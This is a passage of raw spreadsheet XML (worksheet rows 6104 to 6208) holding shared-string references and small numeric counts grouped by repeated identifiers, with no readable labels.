    <row r="6104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6104" t="s">
        <v>16228</v>
      </c>
      <c r="B6104" t="s">
        <v>16215</v>
      </c>
      <c r="C6104">
        <v>9</v>
      </c>
      <c r="D6104">
        <v>459</v>
      </c>
    </row>
    <row r="6105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6105" t="s">
        <v>16231</v>
      </c>
      <c r="B6105" t="s">
        <v>16216</v>
      </c>
      <c r="C6105">
        <v>8</v>
      </c>
      <c r="D6105">
        <v>459</v>
      </c>
    </row>
    <row r="6106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6106" t="s">
        <v>16228</v>
      </c>
      <c r="B6106" t="s">
        <v>16217</v>
      </c>
      <c r="C6106">
        <v>0</v>
      </c>
      <c r="D6106">
        <v>459</v>
      </c>
    </row>
    <row r="6107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6107" t="s">
        <v>16231</v>
      </c>
      <c r="B6107" t="s">
        <v>16218</v>
      </c>
      <c r="C6107">
        <v>0</v>
      </c>
      <c r="D6107">
        <v>459</v>
      </c>
    </row>
    <row r="6108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6108" t="s">
        <v>16229</v>
      </c>
      <c r="B6108" t="s">
        <v>16219</v>
      </c>
      <c r="C6108">
        <v>0</v>
      </c>
      <c r="D6108">
        <v>459</v>
      </c>
    </row>
    <row r="6109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6109" t="s">
        <v>16230</v>
      </c>
      <c r="B6109" t="s">
        <v>16220</v>
      </c>
      <c r="C6109">
        <v>0</v>
      </c>
      <c r="D6109">
        <v>459</v>
      </c>
    </row>
    <row r="6110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6110" t="s">
        <v>16229</v>
      </c>
      <c r="B6110" t="s">
        <v>16221</v>
      </c>
      <c r="C6110">
        <v>139</v>
      </c>
      <c r="D6110">
        <v>459</v>
      </c>
    </row>
    <row r="6111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6111" t="s">
        <v>16230</v>
      </c>
      <c r="B6111" t="s">
        <v>16222</v>
      </c>
      <c r="C6111">
        <v>131</v>
      </c>
      <c r="D6111">
        <v>459</v>
      </c>
    </row>
    <row r="6112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6112" t="s">
        <v>16223</v>
      </c>
      <c r="B6112" t="s">
        <v>16223</v>
      </c>
      <c r="C6112">
        <v>26</v>
      </c>
      <c r="D6112">
        <v>459</v>
      </c>
    </row>
    <row r="6113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6113" t="s">
        <v>16224</v>
      </c>
      <c r="B6113" t="s">
        <v>16224</v>
      </c>
      <c r="C6113">
        <v>2</v>
      </c>
      <c r="D6113">
        <v>459</v>
      </c>
    </row>
    <row r="6114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6114" t="s">
        <v>16228</v>
      </c>
      <c r="B6114" t="s">
        <v>16211</v>
      </c>
      <c r="C6114">
        <v>0</v>
      </c>
      <c r="D6114">
        <v>395</v>
      </c>
    </row>
    <row r="6115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6115" t="s">
        <v>16231</v>
      </c>
      <c r="B6115" t="s">
        <v>16212</v>
      </c>
      <c r="C6115">
        <v>0</v>
      </c>
      <c r="D6115">
        <v>395</v>
      </c>
    </row>
    <row r="6116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6116" t="s">
        <v>16228</v>
      </c>
      <c r="B6116" t="s">
        <v>16213</v>
      </c>
      <c r="C6116">
        <v>0</v>
      </c>
      <c r="D6116">
        <v>395</v>
      </c>
    </row>
    <row r="6117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6117" t="s">
        <v>16231</v>
      </c>
      <c r="B6117" t="s">
        <v>16214</v>
      </c>
      <c r="C6117">
        <v>0</v>
      </c>
      <c r="D6117">
        <v>395</v>
      </c>
    </row>
    <row r="6118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6118" t="s">
        <v>16228</v>
      </c>
      <c r="B6118" t="s">
        <v>16215</v>
      </c>
      <c r="C6118">
        <v>1</v>
      </c>
      <c r="D6118">
        <v>395</v>
      </c>
    </row>
    <row r="6119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6119" t="s">
        <v>16231</v>
      </c>
      <c r="B6119" t="s">
        <v>16216</v>
      </c>
      <c r="C6119">
        <v>0</v>
      </c>
      <c r="D6119">
        <v>395</v>
      </c>
    </row>
    <row r="6120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6120" t="s">
        <v>16228</v>
      </c>
      <c r="B6120" t="s">
        <v>16217</v>
      </c>
      <c r="C6120">
        <v>10</v>
      </c>
      <c r="D6120">
        <v>395</v>
      </c>
    </row>
    <row r="6121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6121" t="s">
        <v>16231</v>
      </c>
      <c r="B6121" t="s">
        <v>16218</v>
      </c>
      <c r="C6121">
        <v>7</v>
      </c>
      <c r="D6121">
        <v>395</v>
      </c>
    </row>
    <row r="6122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6122" t="s">
        <v>16229</v>
      </c>
      <c r="B6122" t="s">
        <v>16219</v>
      </c>
      <c r="C6122">
        <v>1</v>
      </c>
      <c r="D6122">
        <v>395</v>
      </c>
    </row>
    <row r="6123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6123" t="s">
        <v>16230</v>
      </c>
      <c r="B6123" t="s">
        <v>16220</v>
      </c>
      <c r="C6123">
        <v>0</v>
      </c>
      <c r="D6123">
        <v>395</v>
      </c>
    </row>
    <row r="6124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6124" t="s">
        <v>16229</v>
      </c>
      <c r="B6124" t="s">
        <v>16221</v>
      </c>
      <c r="C6124">
        <v>0</v>
      </c>
      <c r="D6124">
        <v>395</v>
      </c>
    </row>
    <row r="6125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6125" t="s">
        <v>16230</v>
      </c>
      <c r="B6125" t="s">
        <v>16222</v>
      </c>
      <c r="C6125">
        <v>0</v>
      </c>
      <c r="D6125">
        <v>395</v>
      </c>
    </row>
    <row r="6126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6126" t="s">
        <v>16223</v>
      </c>
      <c r="B6126" t="s">
        <v>16223</v>
      </c>
      <c r="C6126">
        <v>24</v>
      </c>
      <c r="D6126">
        <v>395</v>
      </c>
    </row>
    <row r="6127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6127" t="s">
        <v>16224</v>
      </c>
      <c r="B6127" t="s">
        <v>16224</v>
      </c>
      <c r="C6127">
        <v>1</v>
      </c>
      <c r="D6127">
        <v>395</v>
      </c>
    </row>
    <row r="6128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6128" t="s">
        <v>16228</v>
      </c>
      <c r="B6128" t="s">
        <v>16211</v>
      </c>
      <c r="C6128">
        <v>0</v>
      </c>
      <c r="D6128">
        <v>2234</v>
      </c>
    </row>
    <row r="6129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6129" t="s">
        <v>16231</v>
      </c>
      <c r="B6129" t="s">
        <v>16212</v>
      </c>
      <c r="C6129">
        <v>0</v>
      </c>
      <c r="D6129">
        <v>2234</v>
      </c>
    </row>
    <row r="6130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6130" t="s">
        <v>16228</v>
      </c>
      <c r="B6130" t="s">
        <v>16213</v>
      </c>
      <c r="C6130">
        <v>0</v>
      </c>
      <c r="D6130">
        <v>2234</v>
      </c>
    </row>
    <row r="6131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6131" t="s">
        <v>16231</v>
      </c>
      <c r="B6131" t="s">
        <v>16214</v>
      </c>
      <c r="C6131">
        <v>0</v>
      </c>
      <c r="D6131">
        <v>2234</v>
      </c>
    </row>
    <row r="6132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6132" t="s">
        <v>16228</v>
      </c>
      <c r="B6132" t="s">
        <v>16215</v>
      </c>
      <c r="C6132">
        <v>1</v>
      </c>
      <c r="D6132">
        <v>2234</v>
      </c>
    </row>
    <row r="6133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6133" t="s">
        <v>16231</v>
      </c>
      <c r="B6133" t="s">
        <v>16216</v>
      </c>
      <c r="C6133">
        <v>1</v>
      </c>
      <c r="D6133">
        <v>2234</v>
      </c>
    </row>
    <row r="6134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6134" t="s">
        <v>16228</v>
      </c>
      <c r="B6134" t="s">
        <v>16217</v>
      </c>
      <c r="C6134">
        <v>1</v>
      </c>
      <c r="D6134">
        <v>2234</v>
      </c>
    </row>
    <row r="6135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6135" t="s">
        <v>16231</v>
      </c>
      <c r="B6135" t="s">
        <v>16218</v>
      </c>
      <c r="C6135">
        <v>5</v>
      </c>
      <c r="D6135">
        <v>2234</v>
      </c>
    </row>
    <row r="6136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6136" t="s">
        <v>16229</v>
      </c>
      <c r="B6136" t="s">
        <v>16219</v>
      </c>
      <c r="C6136">
        <v>0</v>
      </c>
      <c r="D6136">
        <v>2234</v>
      </c>
    </row>
    <row r="6137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6137" t="s">
        <v>16230</v>
      </c>
      <c r="B6137" t="s">
        <v>16220</v>
      </c>
      <c r="C6137">
        <v>0</v>
      </c>
      <c r="D6137">
        <v>2234</v>
      </c>
    </row>
    <row r="6138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6138" t="s">
        <v>16229</v>
      </c>
      <c r="B6138" t="s">
        <v>16221</v>
      </c>
      <c r="C6138">
        <v>0</v>
      </c>
      <c r="D6138">
        <v>2234</v>
      </c>
    </row>
    <row r="6139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6139" t="s">
        <v>16230</v>
      </c>
      <c r="B6139" t="s">
        <v>16222</v>
      </c>
      <c r="C6139">
        <v>4</v>
      </c>
      <c r="D6139">
        <v>2234</v>
      </c>
    </row>
    <row r="6140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6140" t="s">
        <v>16223</v>
      </c>
      <c r="B6140" t="s">
        <v>16223</v>
      </c>
      <c r="C6140">
        <v>0</v>
      </c>
      <c r="D6140">
        <v>2234</v>
      </c>
    </row>
    <row r="6141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6141" t="s">
        <v>16224</v>
      </c>
      <c r="B6141" t="s">
        <v>16224</v>
      </c>
      <c r="C6141">
        <v>0</v>
      </c>
      <c r="D6141">
        <v>2234</v>
      </c>
    </row>
    <row r="6142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6142" t="s">
        <v>16228</v>
      </c>
      <c r="B6142" t="s">
        <v>16211</v>
      </c>
      <c r="C6142">
        <v>0</v>
      </c>
      <c r="D6142">
        <v>1852</v>
      </c>
    </row>
    <row r="6143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6143" t="s">
        <v>16231</v>
      </c>
      <c r="B6143" t="s">
        <v>16212</v>
      </c>
      <c r="C6143">
        <v>0</v>
      </c>
      <c r="D6143">
        <v>1852</v>
      </c>
    </row>
    <row r="6144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6144" t="s">
        <v>16228</v>
      </c>
      <c r="B6144" t="s">
        <v>16213</v>
      </c>
      <c r="C6144">
        <v>0</v>
      </c>
      <c r="D6144">
        <v>1852</v>
      </c>
    </row>
    <row r="6145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6145" t="s">
        <v>16231</v>
      </c>
      <c r="B6145" t="s">
        <v>16214</v>
      </c>
      <c r="C6145">
        <v>0</v>
      </c>
      <c r="D6145">
        <v>1852</v>
      </c>
    </row>
    <row r="6146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6146" t="s">
        <v>16228</v>
      </c>
      <c r="B6146" t="s">
        <v>16215</v>
      </c>
      <c r="C6146">
        <v>11</v>
      </c>
      <c r="D6146">
        <v>1852</v>
      </c>
    </row>
    <row r="6147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6147" t="s">
        <v>16231</v>
      </c>
      <c r="B6147" t="s">
        <v>16216</v>
      </c>
      <c r="C6147">
        <v>2</v>
      </c>
      <c r="D6147">
        <v>1852</v>
      </c>
    </row>
    <row r="6148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6148" t="s">
        <v>16228</v>
      </c>
      <c r="B6148" t="s">
        <v>16217</v>
      </c>
      <c r="C6148">
        <v>2</v>
      </c>
      <c r="D6148">
        <v>1852</v>
      </c>
    </row>
    <row r="6149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6149" t="s">
        <v>16231</v>
      </c>
      <c r="B6149" t="s">
        <v>16218</v>
      </c>
      <c r="C6149">
        <v>8</v>
      </c>
      <c r="D6149">
        <v>1852</v>
      </c>
    </row>
    <row r="6150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6150" t="s">
        <v>16229</v>
      </c>
      <c r="B6150" t="s">
        <v>16219</v>
      </c>
      <c r="C6150">
        <v>10</v>
      </c>
      <c r="D6150">
        <v>1852</v>
      </c>
    </row>
    <row r="6151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6151" t="s">
        <v>16230</v>
      </c>
      <c r="B6151" t="s">
        <v>16220</v>
      </c>
      <c r="C6151">
        <v>10</v>
      </c>
      <c r="D6151">
        <v>1852</v>
      </c>
    </row>
    <row r="6152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6152" t="s">
        <v>16229</v>
      </c>
      <c r="B6152" t="s">
        <v>16221</v>
      </c>
      <c r="C6152">
        <v>24</v>
      </c>
      <c r="D6152">
        <v>1852</v>
      </c>
    </row>
    <row r="6153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6153" t="s">
        <v>16230</v>
      </c>
      <c r="B6153" t="s">
        <v>16222</v>
      </c>
      <c r="C6153">
        <v>40</v>
      </c>
      <c r="D6153">
        <v>1852</v>
      </c>
    </row>
    <row r="6154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6154" t="s">
        <v>16223</v>
      </c>
      <c r="B6154" t="s">
        <v>16223</v>
      </c>
      <c r="C6154">
        <v>26</v>
      </c>
      <c r="D6154">
        <v>1852</v>
      </c>
    </row>
    <row r="6155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6155" t="s">
        <v>16224</v>
      </c>
      <c r="B6155" t="s">
        <v>16224</v>
      </c>
      <c r="C6155">
        <v>2</v>
      </c>
      <c r="D6155">
        <v>1852</v>
      </c>
    </row>
    <row r="6156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6156" t="s">
        <v>16228</v>
      </c>
      <c r="B6156" t="s">
        <v>16211</v>
      </c>
      <c r="C6156">
        <v>0</v>
      </c>
      <c r="D6156">
        <v>1912</v>
      </c>
    </row>
    <row r="6157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6157" t="s">
        <v>16231</v>
      </c>
      <c r="B6157" t="s">
        <v>16212</v>
      </c>
      <c r="C6157">
        <v>0</v>
      </c>
      <c r="D6157">
        <v>1912</v>
      </c>
    </row>
    <row r="6158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6158" t="s">
        <v>16228</v>
      </c>
      <c r="B6158" t="s">
        <v>16213</v>
      </c>
      <c r="C6158">
        <v>0</v>
      </c>
      <c r="D6158">
        <v>1912</v>
      </c>
    </row>
    <row r="6159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6159" t="s">
        <v>16231</v>
      </c>
      <c r="B6159" t="s">
        <v>16214</v>
      </c>
      <c r="C6159">
        <v>0</v>
      </c>
      <c r="D6159">
        <v>1912</v>
      </c>
    </row>
    <row r="6160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6160" t="s">
        <v>16228</v>
      </c>
      <c r="B6160" t="s">
        <v>16215</v>
      </c>
      <c r="C6160">
        <v>3</v>
      </c>
      <c r="D6160">
        <v>1912</v>
      </c>
    </row>
    <row r="6161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6161" t="s">
        <v>16231</v>
      </c>
      <c r="B6161" t="s">
        <v>16216</v>
      </c>
      <c r="C6161">
        <v>0</v>
      </c>
      <c r="D6161">
        <v>1912</v>
      </c>
    </row>
    <row r="6162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6162" t="s">
        <v>16228</v>
      </c>
      <c r="B6162" t="s">
        <v>16217</v>
      </c>
      <c r="C6162">
        <v>10</v>
      </c>
      <c r="D6162">
        <v>1912</v>
      </c>
    </row>
    <row r="6163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6163" t="s">
        <v>16231</v>
      </c>
      <c r="B6163" t="s">
        <v>16218</v>
      </c>
      <c r="C6163">
        <v>0</v>
      </c>
      <c r="D6163">
        <v>1912</v>
      </c>
    </row>
    <row r="6164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6164" t="s">
        <v>16229</v>
      </c>
      <c r="B6164" t="s">
        <v>16219</v>
      </c>
      <c r="C6164">
        <v>0</v>
      </c>
      <c r="D6164">
        <v>1912</v>
      </c>
    </row>
    <row r="6165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6165" t="s">
        <v>16230</v>
      </c>
      <c r="B6165" t="s">
        <v>16220</v>
      </c>
      <c r="C6165">
        <v>0</v>
      </c>
      <c r="D6165">
        <v>1912</v>
      </c>
    </row>
    <row r="6166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6166" t="s">
        <v>16229</v>
      </c>
      <c r="B6166" t="s">
        <v>16221</v>
      </c>
      <c r="C6166">
        <v>0</v>
      </c>
      <c r="D6166">
        <v>1912</v>
      </c>
    </row>
    <row r="6167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6167" t="s">
        <v>16230</v>
      </c>
      <c r="B6167" t="s">
        <v>16222</v>
      </c>
      <c r="C6167">
        <v>0</v>
      </c>
      <c r="D6167">
        <v>1912</v>
      </c>
    </row>
    <row r="6168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6168" t="s">
        <v>16223</v>
      </c>
      <c r="B6168" t="s">
        <v>16223</v>
      </c>
      <c r="C6168">
        <v>24</v>
      </c>
      <c r="D6168">
        <v>1912</v>
      </c>
    </row>
    <row r="6169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6169" t="s">
        <v>16224</v>
      </c>
      <c r="B6169" t="s">
        <v>16224</v>
      </c>
      <c r="C6169">
        <v>0</v>
      </c>
      <c r="D6169">
        <v>1912</v>
      </c>
    </row>
    <row r="6170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6170" t="s">
        <v>16228</v>
      </c>
      <c r="B6170" t="s">
        <v>16211</v>
      </c>
      <c r="C6170">
        <v>0</v>
      </c>
      <c r="D6170">
        <v>541</v>
      </c>
    </row>
    <row r="6171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6171" t="s">
        <v>16231</v>
      </c>
      <c r="B6171" t="s">
        <v>16212</v>
      </c>
      <c r="C6171">
        <v>0</v>
      </c>
      <c r="D6171">
        <v>541</v>
      </c>
    </row>
    <row r="6172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6172" t="s">
        <v>16228</v>
      </c>
      <c r="B6172" t="s">
        <v>16213</v>
      </c>
      <c r="C6172">
        <v>0</v>
      </c>
      <c r="D6172">
        <v>541</v>
      </c>
    </row>
    <row r="6173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6173" t="s">
        <v>16231</v>
      </c>
      <c r="B6173" t="s">
        <v>16214</v>
      </c>
      <c r="C6173">
        <v>0</v>
      </c>
      <c r="D6173">
        <v>541</v>
      </c>
    </row>
    <row r="6174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6174" t="s">
        <v>16228</v>
      </c>
      <c r="B6174" t="s">
        <v>16215</v>
      </c>
      <c r="C6174">
        <v>2</v>
      </c>
      <c r="D6174">
        <v>541</v>
      </c>
    </row>
    <row r="6175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6175" t="s">
        <v>16231</v>
      </c>
      <c r="B6175" t="s">
        <v>16216</v>
      </c>
      <c r="C6175">
        <v>1</v>
      </c>
      <c r="D6175">
        <v>541</v>
      </c>
    </row>
    <row r="6176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6176" t="s">
        <v>16228</v>
      </c>
      <c r="B6176" t="s">
        <v>16217</v>
      </c>
      <c r="C6176">
        <v>2</v>
      </c>
      <c r="D6176">
        <v>541</v>
      </c>
    </row>
    <row r="6177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6177" t="s">
        <v>16231</v>
      </c>
      <c r="B6177" t="s">
        <v>16218</v>
      </c>
      <c r="C6177">
        <v>1</v>
      </c>
      <c r="D6177">
        <v>541</v>
      </c>
    </row>
    <row r="6178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6178" t="s">
        <v>16229</v>
      </c>
      <c r="B6178" t="s">
        <v>16219</v>
      </c>
      <c r="C6178">
        <v>0</v>
      </c>
      <c r="D6178">
        <v>541</v>
      </c>
    </row>
    <row r="6179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6179" t="s">
        <v>16230</v>
      </c>
      <c r="B6179" t="s">
        <v>16220</v>
      </c>
      <c r="C6179">
        <v>0</v>
      </c>
      <c r="D6179">
        <v>541</v>
      </c>
    </row>
    <row r="6180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6180" t="s">
        <v>16229</v>
      </c>
      <c r="B6180" t="s">
        <v>16221</v>
      </c>
      <c r="C6180">
        <v>4</v>
      </c>
      <c r="D6180">
        <v>541</v>
      </c>
    </row>
    <row r="6181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6181" t="s">
        <v>16230</v>
      </c>
      <c r="B6181" t="s">
        <v>16222</v>
      </c>
      <c r="C6181">
        <v>5</v>
      </c>
      <c r="D6181">
        <v>541</v>
      </c>
    </row>
    <row r="6182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6182" t="s">
        <v>16223</v>
      </c>
      <c r="B6182" t="s">
        <v>16223</v>
      </c>
      <c r="C6182">
        <v>25</v>
      </c>
      <c r="D6182">
        <v>541</v>
      </c>
    </row>
    <row r="6183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6183" t="s">
        <v>16224</v>
      </c>
      <c r="B6183" t="s">
        <v>16224</v>
      </c>
      <c r="C6183">
        <v>1</v>
      </c>
      <c r="D6183">
        <v>541</v>
      </c>
    </row>
    <row r="6184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6184" t="s">
        <v>16228</v>
      </c>
      <c r="B6184" t="s">
        <v>16211</v>
      </c>
      <c r="C6184">
        <v>0</v>
      </c>
      <c r="D6184">
        <v>2756</v>
      </c>
    </row>
    <row r="6185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6185" t="s">
        <v>16231</v>
      </c>
      <c r="B6185" t="s">
        <v>16212</v>
      </c>
      <c r="C6185">
        <v>0</v>
      </c>
      <c r="D6185">
        <v>2756</v>
      </c>
    </row>
    <row r="6186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6186" t="s">
        <v>16228</v>
      </c>
      <c r="B6186" t="s">
        <v>16213</v>
      </c>
      <c r="C6186">
        <v>0</v>
      </c>
      <c r="D6186">
        <v>2756</v>
      </c>
    </row>
    <row r="6187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6187" t="s">
        <v>16231</v>
      </c>
      <c r="B6187" t="s">
        <v>16214</v>
      </c>
      <c r="C6187">
        <v>0</v>
      </c>
      <c r="D6187">
        <v>2756</v>
      </c>
    </row>
    <row r="6188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6188" t="s">
        <v>16228</v>
      </c>
      <c r="B6188" t="s">
        <v>16215</v>
      </c>
      <c r="C6188">
        <v>1</v>
      </c>
      <c r="D6188">
        <v>2756</v>
      </c>
    </row>
    <row r="6189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6189" t="s">
        <v>16231</v>
      </c>
      <c r="B6189" t="s">
        <v>16216</v>
      </c>
      <c r="C6189">
        <v>1</v>
      </c>
      <c r="D6189">
        <v>2756</v>
      </c>
    </row>
    <row r="6190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6190" t="s">
        <v>16228</v>
      </c>
      <c r="B6190" t="s">
        <v>16217</v>
      </c>
      <c r="C6190">
        <v>13</v>
      </c>
      <c r="D6190">
        <v>2756</v>
      </c>
    </row>
    <row r="6191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6191" t="s">
        <v>16231</v>
      </c>
      <c r="B6191" t="s">
        <v>16218</v>
      </c>
      <c r="C6191">
        <v>0</v>
      </c>
      <c r="D6191">
        <v>2756</v>
      </c>
    </row>
    <row r="6192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6192" t="s">
        <v>16229</v>
      </c>
      <c r="B6192" t="s">
        <v>16219</v>
      </c>
      <c r="C6192">
        <v>0</v>
      </c>
      <c r="D6192">
        <v>2756</v>
      </c>
    </row>
    <row r="6193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6193" t="s">
        <v>16230</v>
      </c>
      <c r="B6193" t="s">
        <v>16220</v>
      </c>
      <c r="C6193">
        <v>0</v>
      </c>
      <c r="D6193">
        <v>2756</v>
      </c>
    </row>
    <row r="6194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6194" t="s">
        <v>16229</v>
      </c>
      <c r="B6194" t="s">
        <v>16221</v>
      </c>
      <c r="C6194">
        <v>0</v>
      </c>
      <c r="D6194">
        <v>2756</v>
      </c>
    </row>
    <row r="6195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6195" t="s">
        <v>16230</v>
      </c>
      <c r="B6195" t="s">
        <v>16222</v>
      </c>
      <c r="C6195">
        <v>0</v>
      </c>
      <c r="D6195">
        <v>2756</v>
      </c>
    </row>
    <row r="6196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6196" t="s">
        <v>16223</v>
      </c>
      <c r="B6196" t="s">
        <v>16223</v>
      </c>
      <c r="C6196">
        <v>30</v>
      </c>
      <c r="D6196">
        <v>2756</v>
      </c>
    </row>
    <row r="6197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6197" t="s">
        <v>16224</v>
      </c>
      <c r="B6197" t="s">
        <v>16224</v>
      </c>
      <c r="C6197">
        <v>1</v>
      </c>
      <c r="D6197">
        <v>2756</v>
      </c>
    </row>
    <row r="6198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6198" t="s">
        <v>16228</v>
      </c>
      <c r="B6198" t="s">
        <v>16211</v>
      </c>
      <c r="C6198">
        <v>0</v>
      </c>
      <c r="D6198">
        <v>840</v>
      </c>
    </row>
    <row r="6199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6199" t="s">
        <v>16231</v>
      </c>
      <c r="B6199" t="s">
        <v>16212</v>
      </c>
      <c r="C6199">
        <v>0</v>
      </c>
      <c r="D6199">
        <v>840</v>
      </c>
    </row>
    <row r="6200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6200" t="s">
        <v>16228</v>
      </c>
      <c r="B6200" t="s">
        <v>16213</v>
      </c>
      <c r="C6200">
        <v>0</v>
      </c>
      <c r="D6200">
        <v>840</v>
      </c>
    </row>
    <row r="6201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6201" t="s">
        <v>16231</v>
      </c>
      <c r="B6201" t="s">
        <v>16214</v>
      </c>
      <c r="C6201">
        <v>0</v>
      </c>
      <c r="D6201">
        <v>840</v>
      </c>
    </row>
    <row r="6202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6202" t="s">
        <v>16228</v>
      </c>
      <c r="B6202" t="s">
        <v>16215</v>
      </c>
      <c r="C6202">
        <v>0</v>
      </c>
      <c r="D6202">
        <v>840</v>
      </c>
    </row>
    <row r="6203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6203" t="s">
        <v>16231</v>
      </c>
      <c r="B6203" t="s">
        <v>16216</v>
      </c>
      <c r="C6203">
        <v>1</v>
      </c>
      <c r="D6203">
        <v>840</v>
      </c>
    </row>
    <row r="6204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6204" t="s">
        <v>16228</v>
      </c>
      <c r="B6204" t="s">
        <v>16217</v>
      </c>
      <c r="C6204">
        <v>0</v>
      </c>
      <c r="D6204">
        <v>840</v>
      </c>
    </row>
    <row r="6205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6205" t="s">
        <v>16231</v>
      </c>
      <c r="B6205" t="s">
        <v>16218</v>
      </c>
      <c r="C6205">
        <v>0</v>
      </c>
      <c r="D6205">
        <v>840</v>
      </c>
    </row>
    <row r="6206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6206" t="s">
        <v>16229</v>
      </c>
      <c r="B6206" t="s">
        <v>16219</v>
      </c>
      <c r="C6206">
        <v>0</v>
      </c>
      <c r="D6206">
        <v>840</v>
      </c>
    </row>
    <row r="6207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6207" t="s">
        <v>16230</v>
      </c>
      <c r="B6207" t="s">
        <v>16220</v>
      </c>
      <c r="C6207">
        <v>0</v>
      </c>
      <c r="D6207">
        <v>840</v>
      </c>
    </row>
    <row r="6208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6208" t="s">
        <v>16229</v>
      </c>
      <c r="B6208" t="s">
        <v>16221</v>
      </c>
      <c r="C6208">
        <v>0</v>
      </c>
      <c r="D6208">
        <v>840</v>
      </c>
    </row>
    <row r="6209" spans="1:4" x14ac:dyDescent="0.2">
